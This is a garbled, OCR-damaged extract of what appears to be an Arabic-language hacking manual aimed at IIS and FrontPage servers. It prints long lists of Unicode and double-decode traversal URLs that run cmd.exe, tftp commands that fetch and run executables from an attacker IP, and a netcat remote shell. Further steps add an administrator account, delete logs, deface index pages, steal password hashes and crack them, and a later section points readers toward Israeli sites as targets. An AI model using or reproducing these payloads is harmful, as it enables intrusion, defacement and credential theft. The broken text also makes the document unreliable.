((sS TCP SYN stealth port scan (default if privileged (root- *
(sT TCP connect() port scan (default for unprivileged userssU UDP port scan- *
(sP ping scan (Find any reachable machines(sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only- *
(sR/-I RPC/Identd scan (use with other scan types:(Some Common Options (none are required, most can be combined
O Use TCP/IP fingerprinting to guess remote operating system- *
'p ports to scan. Example range: '1-1024,1080,6666,31337F Only scans ports listed in nmap-services.v Verbose. Its use is recommended. Use twice for greater effectP0 Don't ping hosts (needed to scan http://www.microsoft.com/ and(others
Ddecoy_host1,decoy2[,...] Hide scan using many decoys- *
T General timing policyn/-R Never do DNS resolution/Always resolve [default: sometimes[resolve
oN/-oX/-oG Output normal/XML/grepable scan logs toiL Get targets from file; Use '-' for stdinS /-e Specify source address or network interface- *
(interactive Go into interactive mode (then press h for help-Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16 '192.88'*.*.90
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND
EXAMPLES
!!!!!!!!!
.. man page
nmap -sS -O -vv almodammer.com
= almodammer.com
.......
^^^^^^^^^^^^^^^^^^^
=(=(
117
^^^^^^^^^^^^^^^^^^^
Linux Shell Account
Linux Shell
Linux
whois
Linux
man whois
------------------------------------------------------------------ google
http://www.google.com/search?q=whois&btnG=Google+Search
cgi
netcraft ..............
118
" "
> <
>>P @ LH@CKERZ :
1
//:http
:
\
/http://www.XXX.com
/
2
3
4
119
5
6
7
8
9
10
11
11 10 :
12
:
.
120
" ) ( "
><
><sNiper_hEx :
) 13 ( -:
.
.
.
.
. CMD
.
. ECHO
CMD
.
Access Denied . . FTP
.
. TFTP
.
-
121
.
. NT4 / Win2k
IIS4.0 / IIS5.0
.
anonymous
person
.
.
-:
-1
.
.
-2
.
IIS4 / IIS5 CMD
.
. CMD
CMD
-:
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+md+c:\hEx
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+rd+c:\hEx
:
http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.ex
e
:
http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\hEx.e
\xe+c:
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb
: http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm
: http://www.xxxx.com/msadc/..%c0%af../..
%c0%af../winnt/system32/cmd.exe?/c+type+c:\hEx.txt
:
http://www.xxxx.com/msadc/..
%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt
:
122
:
http://www.xxxx.com/msadc/hEx.mdb
.
-:
\:http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c
\:http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c
-:
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
. ECHO
-:
\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c
-:
w3svc.exe
inetpub\scripts
?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe
w3svc.exe
-:
inetpub\scripts
\:http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c
inetpub\wwwroot\index.htm -:
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.co
m+>+c:\inetpub\wwwroot\index.htm
.
CMD
-:
CMD
?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
CMD -:
\:http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd1.exe?c+dir+c
Access Denied . Access Denied
Access Denied
-:
CMD CMD1
-1
Copy -:
123
?http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
ssinc.dll -:
-2
test.shtml
o
wwwroot/hEx/test.shtml
o
>! <--"include file="AAAA[...]AA#--
o
A 2049 .
http://www.xxxx.com/test.shtml
o
.
o
. Access Denied
o
500
o
.
NC.exe
-3
Temp Temp
.
-4
.
root.exe sensepost.exe shell.exe w3svc.exe :
-5
c:\inetpub\scripts .
-1
. FTP
CMD Scripts Shell.exe
c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe/
124
hEx@Hotmail.Com
Get index.html
Quit
"msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl/
.
) ( Microsoft Access L0phtCrack
-:
_.SAM \
\winnt\repair L0phtCrack
-:
PASSFILT.DLL -:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT.DLL
ASP
MySQL ) ( htr.+
-:
http://www.xxxx.com/default.asp+.htr
database.inc
.
. TFTP
-1 index.htm \:c
-2 TFTP .
125
c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm/
tftp.exe
""i-
1.1.1.1
GET
index.htm
\\inetpub\wwwroot
index.htm
.
Log System32 -:
c+del+c:/winnt/system32/logfiles/*.log/
" ) ( "
126
> <
..
..
:
------------- )( cmd cmd1
:
+C+copy+c:\winnt\system32
c:\winnt\system32\cmd1.exe .. Echo
) CMD1.exe ( !
..
IWAM_USER Guest
. IIS
Guest !! (:
(: * nix Microsot
(: Administrator (:
..
(: ..
+ :
Sechole.exe .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe
.. (:
:
Sechole - 1 .. ) (
..
. (:
Tlist - 2 .. +
(:
Kill.exe -3 .
NCX99 -3 NC 99
TFTP32.exe -4 ..
127
(: :
..
ncx99.exe :
http://target/scripts/..../winnt/system32/cmd1.exe?/c+C:\ncx99.exe
.. 99
CMD = . Guest
.. TLIST .. PID
.. ..
PID ..
Kill .. KILL.exe PID : PID (:
! ..
Sechole .. ..
(: Sechole.exe .
IWAM_USER .. Administrators
. Access Denided
:
+C+Echo+Hacked+by+XDeMoNX
< C;\inetpub\wwwroot\index+
htm.
..
... (:
: IWAM_USER
: .. ! .
(: .. .
Administrator .
!! (: (:
:
net user Demon pass /add && net localgroup administrators Demon /add
Save as . add.bat
: Demon Pass
(: ..
add.bat ) (
(: .. (:
(:
) !(
.
..
netstat -an ..
(:
90% (: 139
128
(:
(:
.. (: .
.. . GUI
..
GEtAdmin Sechole2 .. WINvnc
" "
129
<>
< :>
:
( 1
TFTPD ( 2
( 3
=================================================
=================================================
( 1
/http://www.devil2k.com
(( ))
\:msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c/
msadc/../
%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
\:c+dir+c
msadc/..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
msadc/../
%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c/
msadc/..%%35c../..%%35c../..%/
\:%35c../winnt/system32/cmd.exe?/c+dir+c
msadc/..%%35%63../..%%35%63../..%/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c
msadc/../
%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
\:c+dir+c
MSADC/..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
MSADC/..%%35c..%%35c..%%35c..%/
\:%35cwinnt/system32/cmd.exe?/c+dir+c
MSADC/..%%35%63..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c
MSADC/../
%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/c
\:md.exe?/c+dir+c
vti_bin/..%255c..%255c..%255c..%255c.._/
\:%255c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35c..%%35c..%%35c..%%35c..%_/
\:%35c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%_/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c
130
vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
\:PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c/
PBServer/..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c
PBServer/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
\:Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c/
Rpc/..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
\:+c
vti_bin/..%255c..%255c..%255c..%255c.._/
\:%255c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35c..%%35c..%%35c..%%35c..%_/
\:%35c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%_/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c
vti_bin/.._/
%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
samples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
cgi-bin/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
iisadmpwd/..%252f..%252f..%252f..%252f..%252f../
\:%252fwinnt/system32/cmd.exe?/c+dir+c
vti_cnf/..%255c..%255c..%255c..%255c..%255c.._/
\:%255cwinnt/system32/cmd.exe?/c+dir+c
adsamples/..%255c..%255c..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C1%1C..%C1%1C..%C1%1C../
\:%C1%1Cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C1%9C..%C1%9C..%C1%9C../
\:%C1%9Cwinnt/system32/cmd.exe?/c+dir+c
scripts/..%C0%AF..%C0%AF..%C0%AF../
\:%C0%AFwinnt/system32/cmd.exe?/c+dir+c
\:scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
131
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%c0%af../..%c0%af../.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\/
\:%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c
cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
samples/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
adsamples/..%c0%af..%c0%af..%c0%af..%c0%af../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
TFTPD ( 2
/http://iisbughelp.4t.com
( 3
( )
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
C:\
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+D
D:\
scripts]/..%c0%af../..%c0%af../..]/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+E
E:\
132
))
((
(1 msadc
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
(2 _vti_bin
vti_bin/..%c0%af../..%c0%af../.._/
\:%c0%af../winnt/system32/cmd.exe?/c+dir+C
IIS )) (( :
C:\Inetpub\wwwroot
D:\Inetpub\wwwroot
E:\Inetpub\wwwroot
C
msadc/..%c0%af../..%c0%af../../
\:%c0%af../winnt/system32/cmd.exe?/c+dir+c
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot
)
( wwwroot
wwwroot
index.htm
)) ((
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp
wwwroot index.htm
index.htm ss.htm
c+dir c+ren
)) Dos Command
Prompt
:
133
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.ht
m+ss.htm
index.htm ss.htm
(:
A
!!!Hacked
index.htm
TFTP
TFTP )
(
\ C:
index.htm \C:
\ C:
C:\inetpub\wwwroot
)) (( TFTP
TFTP )) ((
:
tftp.exe -i XXX.XXX.XXX.XXX get index.htm
C:\inetpub\wwwroot\index.htm
)) XXX.XXX.XXX.XXX ((
index.htm
wwwroot
:
"tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm
(:
TFTP index.htm
:
msadc/..%c1%9c../..%c1%9c../../
"%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm
)) (( (:
: EXE :
134
EXE hunter.exe
:
index.htm \ C:
:
msadc/..%c1%9c../..%c1%9c../../
"%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe
msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe/
msadc/..%c1%9c../..%c1%9c../../
%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe
*.log
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s
tmp
:
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s
)) ((
bat
)) (( system32
______________________________________________________________
__________________
:
tftp
)) (( system32
)) ((
135
###########
# Game Starts !#
###########
---------------136
- : IIS Hack.exe
--------------- eEye nc.exe
.. 80
cmde.exe . Administrator
NC.exe IIS Hack.exe . /http://www.technotronic.com
..
nc.exe ) (Htdocs IIS
. wwwroot
: IISHack.exe
c:\>iishack.exe http://www.target.com/ 80 your_IP/ncx.exe
:
/c:\>nc http://www.target.com eGG SheLL
: IIS4.0 )) (( .
do you want me to explain what to do next, hey common you must be
kidding
....hehe...
-----------------: MDAC = RDS
---------------- ) %40 ..
..
SYSTEM ..
..
c:\>nc -nw -w 2 http://www.host.com/ 80 :
GET /msadc/msadcs.dll HTTP :
application/x_varg : )) (( ..
www.wiretrip.net/rfp :
(( mdac.pl - msadc2.pl )) v
c:\> mdac.pl -h host.com
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
echo hacked by me hehe > :
C:\inetpub\wwwroot\index.htm
Hacker's Swiss knife Army
Nc.exe :
systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r%
nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
)) ((
80 . Administrator
--------------------------------------: Codebrws.asp & Showcode.asp
------------------------------------- ASP IIS
137
..
)) asp.
(( .
)) (( :
_.http://www.victim.com/msadc/samples...nt/repair/sam
.. Expand it & Crack it ) LC3.0
24 ( .
-------------- : Null.htw
----------- .. ..
.. ASP
http://www.victim.com/null.htw?CiWe...HiliteType=full :
. Default.asp
---------------------- : webhits.dll & .htw
--------------------- http://www.victim.com/blabla.htw :
format of the QUERY_STRING is invalid :
. %90
:
www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full
XXXXX/XXXXX/XXXX/XXX.htw , :
iissamples/issamples/oop/qfullhit.htw
iissamples/issamples/oop/qsumrhit.htw
isssamples/exair/search/qfullhit.htw
isssamples/exair/search/qsumrhit.htw
.. LC3
-----------------------------------------------]-: ASP Alternate Data Streams [::$DATA
----------------------------------------------- .. 1998 IIS3.0
.. IIS4.0
)) ((
Global.asa
http://www.victim.com/default.asp::
$DATA
------------------ : ASP dot bug
----------------- ..
138
.. 1997
:
http://www.victim.com/sample.asp.
. IIS3.0
------------------------------------ : ISM.DLL Buffer Truncation
----------------------------------- ..
..
..
ISM.dll )( 20%
. Space
:
http://www.victim.com/global.asa%20(...<=230)global.asa.htr
<=230 230 .. %20
.. IIS 4.0&5.0
,
ISM.dll ..
..
Rebot . Logout & Login
----------: htr.+
-------- . ASP
:
http://www.victim.com/global.asa+.htr
------------- : site.csc
----------- DNS DSN, UID and
.. PASS Database
http://www.victim.com/adsamples/config/site.csc :
.. .
139
" "UniCode
> <
><Dark Devil :
::
.
) .... (
)( Trust Me
::
:
====
Found On 15 May 2001 BY NSFOCUS
::
All running IIS 4 / IIS 5 web server
Windows 2k
Windows 2k SP1 + SP2
:: )
( IUSR_machinename account
cgi
) DeCode (
::
<=== http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c
<==== /http://iisserver
* - /scripts/ )
( cgi
140
( executable directory
iis
:: iis executable directory
)
(
* <=== winnt/system32/cmd.exe cmd
) cmd ping
netstat .... traceroute (
* -
) (
argument
copy
argument /c c/
141
arguments c/
.
, cmd.exe
::
Ping.exe+PRINT cmd.exe?/c
). ( enjoy this ::
http://issserver/scripts/..%5c..%.../ping.exe+PRINT
* - +c/ c/ argument cmd.exe
cmd + c/
+
.
** )
( decode
simplyfiey
::
%255c..%255c../ ..../
iis check
iis
check
iis check
check
( slash) /
::
computer logic HexaDecimal
Values values
/ hex value ::
20% : )(space
hex values
, hex values
decode
( slash) /
::
hex value , 5c% = /
/ value
iis value
hexadecimal values ::
%25 = %
142
%35 = 5
c = %63
iis checker
/ .
simplify
::
%255c %25 = % 5 = 5 c = c = %5c
%%35c % = % %35 = 5 c = c = %5c
c = %5c = %63 5 = %35 % = % %%35%63
c = %5c = %63 5 = %35 % = %25 %25%35%63
/= 5c% :
5c% / = 5c% iis
. checker
::
http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s
s/+
) MCSE
( 2000
.WIN2000 RESOURCE KIT
143
" "
> : <
..
.....
******************
...
.....
2000 .
IIS :
*1 .
*2 .
*3 " ".
*4 .IIS
..
:
wwwroot Inetpub
IIS
/http://127.0.01
/http://127.0.0.1
.
144
" "
> <
>:
<De\/iL Ni9hT
= =-,,,
)),,,,((
=-
=-
.. =-
=-
=-
= =
)) ((
-1
)) ((
145
-2
/http://www.name.8m.com
FreeServerS
))....8m.s5
)) (( ))
((
))
((
=-
IE 5 IE 5.5
)) "
"((
,,,,
keykey2000
http://www.mikkotech.com/kk2000pro.exe
SN: K100-43-109-0-793218E876A4C9-29
godwill 5 ))5.5
((
http://www.thecorpz.org/activex/gwpackage.zip
146
=========================================
enter
Upx )) ((
Html
General options
enter exe file ))
((
enter html use default
page
HTA File Name Done
)) ((
http://www.thecorpz.org/html/activesploits.html
=================== ====================
)) ,,((
.
147
" "
> <
>:
<Linux Girl
) ( cookies
..
...
:
-1 .
-2 .
-3 .
-4 : .
.
.
IP .
Log Files .
.
.
" "
.
148
.
.
: ...
: :
setcookie :
:code
boolean setcookie ( string name [, string value [, int expire
]([[[[[string path [, string domain [, int secure ,
:
: name ...
.
: value ... ... ...
... : serialize
unserialize .
: expire ) 1 ( 1970
... :
<- : .
<- : .
<- : . :
:code
>?
;(setcookie('site','http://www.palhackerz.com/',time()+3600
?<
time )
149
1 . (1970
:
:
:code
>?
;(setcookie('site','',time()-360000
?<
:
-1 .
-2 .
:
setcookie .. :
:code
><html
><body
>?
;(setcookie('site','palhackerz.com',time()+20000
;"echo " Alfjr.com : the best islamic forum
?<
><body/
><html/
150
><body
>? <? ;"echo " palhackerz.com : the best Hacking forum
><body/
><html/
: ..
PHP ...
$_COOKIE Associative Arrays
.
:
:code
>?
;['echo $_COOKIE['site
?<
:
:code
palhackerz.com
:
..
-1 : user.php :
<- : . <- : -2 index.php . user.php
:
-1 : user.php
:code
>?
-----------------------*/
151
}()function display_form
<?
<html>
<body>
<-- Color setting Form --!>
<"form name=color_select method="GET>
<"INPUT type="hidden" name="do" value="set_color>
"=INPUT name="color" type="text" value>
<"<? ;()echo get_color ?>
<"=" INPUT type="submit" value>
<FORM/>
<-- Color Clearing Form --!>
<"form name=color_clear method="GET>
<"INPUT type="hidden" name="do" value="clear_color>
<"=" INPUT type="submit" value>
<FORM/>
?>
152
}()function set_color
;global $_GET
;(setcookie('color',$_GET['color'],time()+36000
;('header('Location:index.php
}()function get_color
;global $_COOKIE
}((['if(isset($_COOKIE['color
;['return $_COOKIE['color
}else{
;"return "#FFFFFF
{
{
}()function clear_color
;(setcookie('color',$_GET['color'],time()-36000
;('header('Location:index.php
{
selection //
}('if ($do=='display_form
;()display_form
153
{}("elseif ($do=="set_color
;()set_color
{}("elseif ($do=="clear_color
;()clear_color
{
?<
display_form . set_color . get_color .
clear_color . -2 : index.php
get_color user.php :
:code
><html
>;('BODY bgcolor="<? include('user.php
<"<? ()echo get_color
><h1 <h1/>.....
><br
><br
154
155
http://www.geocities.com/love2002_il/godwill16.zip
tlsecurity :
:
html Godwill
...
html ...
156
Done
...
157
Gen
...enter Output 3
...
/http://www.tripod.lycos.co.uk ...
...
) ( zone Alarm ...
...
.
158
" "NOOP4
> <
>< .MoHfOx. :
god will .
.. godwill
noob 4.0
=======================================
=============================
-1
=================
======================
=============================
layout 2<<<<====:::
6
-2 Internet Explorer 5
-3 Internet Explorer5.5
4 5
-6
159
==================================================
===================
executable file 3 <<<<====:::
-7
-8
=======================================
=============================
-9 <<<<====:::
160
...
161
" "
><
><. ( T.O.L. ( DeXXa :
:
* .
* FrontPage Server Extensions .
* . Microsoft Office FrontPage
* . CHMOD
* . Telnet
* . HTTP
* . SQL
* Server Side Scripting
. Language
. Screen Capture
@ :
.
.
. FrontPage Server Extensions
. FrontPage Extension Server
. FrontPage Extension Server
. FrontPage
.
@
* . FrontPage Server Extensions
* .
* .
* .
@ :
PHP
CGI Perl SSL FTP . SQL
Webmasters Microsoft
Office FrontPage
162
Office
.
@ FrontPage Server Extensions
) : (
Server
.
:
private_/
vti_bin_/
vti_cnf_/
vti_log_/
vti_pvt_/
vti_txt_/
:
* _: vti_bin
:
) : _( vti_bin
/vti_adm_/..
/vti_aut_/..
.
:
shtml.exe/..
fpcount.exe/..
* _: vti_pvt
:
: service.pwd DES.
: service.grp . authors deptodoc.btr : doctodep.btr
.
htaccess.
)
163
( .
) : (
* _: private
. htaccess.
@ FrontPage Extension Server
FrontPage Extension Server . HTTP
FrontPage Request
FrontPage Extension Server
fpcount.exe
Extension Server
.
@ : FrontPage Extension Server
FrontPage
FTP
.
: FrontPage Extension Server
) : XP
(
* FrontPage . Office
* File . Open Web
* ) ( .
*
.
*
.
@ FrontPage :
:
* :
) : _ vti_inf.html
(
FrontPage . - _ vti_inf.html :
164
http://www.Victim.com/_vti_inf.html
FrontPage Configuration Information FrontPage Extension Server
.
:
. Source Code "FPVersion="Version Version .* _: vti_cnf
FrontPage . :http://www.Victim.com/_vti_cnf
. Source Code :vti_generator:Programe
Programe Microsoft FrontPage X . X
* :
FrontPage . . Source Code > <Head></Head :><"Meta Name="GENERATOR" Content="Programe
Programe Microsoft FrontPage X.0
. X
* : NetCraft
. NetCraft.net . //:http .
FrontPage mod_frontpage/X X
. FrontPage Extensions Server
* : Telnet
165
) :
(
Start Run . Telnet 80 :Microsoft Telnet> Open www.Victim.com 80
Request Method . Head) : ( HTTP
http://www.Victim.net ISP.net :
Head www.Victim.net HTTP/1.1
Host: ISP.net
*/* :Accept
Connection: close
. Response Server .
FrontPage
mod_frontpage/X
X . FrontPage Extensions Server
@ :
_ vti_pvt :
) : PHP
(
* .
* PHP :
>?PHP
;("open = FOpen($file, "r$
;((get = FGets($open, FileSize($file$
;Echo $get
;FClose $open
?<
166
PHP
file
:
http://www.Victim.com/uploded_file...../../etc/passwd
uploded_file
.
167
" "
> <
> :<
//
NT - Unix
-1 frontpage
:
netcraft/http://www.netcraft.com
mod_frontpage/x
)=x (
/_vti_inf.html
/http://www.almodammer.com:
http://www.almodammer.com/_vti_inf.html
Enter
Frontpage Configuration Information
/_vti_cnf
:
http://www.almodammer.com/_vti_cnf
source
vti_generator:Programe
Programe
------------------------------------------------- -2 frontpage
frontpage
/http://www.almodammer.com
fontpage _vti_pvt
http://www.almodammer.com/_vti_pvt
:
168
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
username:passwd
service
user / password
operator:hi9LHn9wAMuKM
operator:
hi9LHn9wAMuKM:
=)=(Crack Jack
=)=(John The Ripper
John The Ripper
::
http://www.openwall.com/john
\c:
RUN
txt passwd
start
run
command
Enter
DoS
RUN
cd..
>\c:
cd john
Enter
169
>c:\john
cd RUN
>c:/john/RUN
John The Ripper
====
john -i:all passd.txt
-------------------------
====
john -i:Alpha passwd.txt
---------------------------------
====
john -i:Digits passwd.txt
---------------------------------
====
john -single passwd.txt
--------------------------------
-------------------------------------------------------------------------------
john.pot
------------------------------------------------------------------------------- username password
!!
/
)(1
frontpage
file
open web
)(2
FTP
FTP
ws-ftp
pro ftp
170
...
DOS
======================================
google
/http://www.google.com
/_vti_pvt
/http://www.altavista.com
link:service.pwd
..
link:adminstrators
password.
171
" "
><
> :<
Random Hacking CGIScripts Random Hacking
spiders
altavista.com ) link:xxxx.cgi or pl (
help.cgi link:help.cgi
Ikonboard HTML
help.cgi http://www.example.com/cgi-
bin/help.cgi
?http://www.example.com/cgi-bin/help.cgi
helpon=../members/[member].cgi%00
] [member ][
Ikonboard
2.1.7
CGIScript url
Exploit
/http://www.secure.f2s.com/eng_ver/bugs
/http://www.securiteam.com
....
...
CGIScripts !!
(:
sites 12610 co.il 1104
sites org.il sites 70 ac.il .sites 78 gov.il
.sites 54 net.il .sites 29 muni.il sites 2009 com
.sites 137 net .org - 121 sites .edu - 4 sites israel.net - 84
.sites ........ .il - sites
http://iguide.co.il/sites/sites.htm
/http://www.achla.co.il
http://www.reshet.co.il/data/index.vs?dw=1
/http://www.maven.co.il
/http://www.tapuz.co.il
/http://www.walla.co.il
172
http://www.info.gov.il/find.pl
altavista.co.il
/w3-msql
proxy.isp.net.sa :8080 GET
GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0
*/* ,Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg
Accept-Language: ar-sa
(User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98
Host: www.com.il
Proxy-Connection: Keep-Alive
